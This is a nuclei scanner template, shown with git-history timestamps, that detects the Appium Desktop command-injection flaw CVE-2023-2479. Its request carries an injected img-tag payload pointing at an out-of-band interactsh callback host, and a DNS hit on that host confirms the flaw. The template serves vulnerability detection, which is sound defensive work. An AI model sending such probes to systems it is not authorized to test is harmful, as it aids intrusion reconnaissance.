nuclei-templates/http/cves/2023/CVE-2023-2479.yaml

48 lines
1.3 KiB
YAML
Raw Normal View History

2023-09-15 07:11:13 +00:00
id: CVE-2023-2479
info:
2023-09-26 07:03:31 +00:00
name: Appium Desktop Server - Remote Code Execution
author: zn9988
severity: critical
description: |
OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4.
remediation: Fixed in v1.22.3-4
2023-09-15 07:11:13 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-2479
2023-09-26 07:03:31 +00:00
cwe-id: CWE-78
epss-score: 0.0008
epss-percentile: 0.3333
cpe: cpe:2.3:a:appium:appium-desktop:*:*:*:*:*:*:*:*
2023-09-26 07:12:57 +00:00
reference:
2023-09-15 07:11:13 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-2479
- https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4/
2023-09-26 07:03:31 +00:00
tags: cve,cve2023,appium,oast,rce
2023-09-15 07:11:13 +00:00
2023-09-26 07:03:31 +00:00
http:
2023-09-15 07:11:13 +00:00
- method: GET
path:
- '{{BaseURL}}/?url=<img/src="http://{{interactsh-url}}">'
2023-09-26 07:12:57 +00:00
2023-09-15 07:11:13 +00:00
matchers-condition: and
matchers:
2023-09-26 07:03:31 +00:00
- type: word
2023-09-26 07:12:57 +00:00
part: body
2023-09-26 07:03:31 +00:00
words:
2023-09-26 07:12:57 +00:00
- 'The requested resource could not be found, or a request was received using an HTTP method that is not supported by the mapped resource'
2023-09-26 07:03:31 +00:00
2023-09-26 07:12:57 +00:00
- type: word
part: header
words:
- 'application/json'
2023-09-15 07:11:13 +00:00
2023-09-26 07:12:57 +00:00
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
2023-09-15 07:11:13 +00:00
2023-09-26 07:12:57 +00:00
- type: status
status:
- 404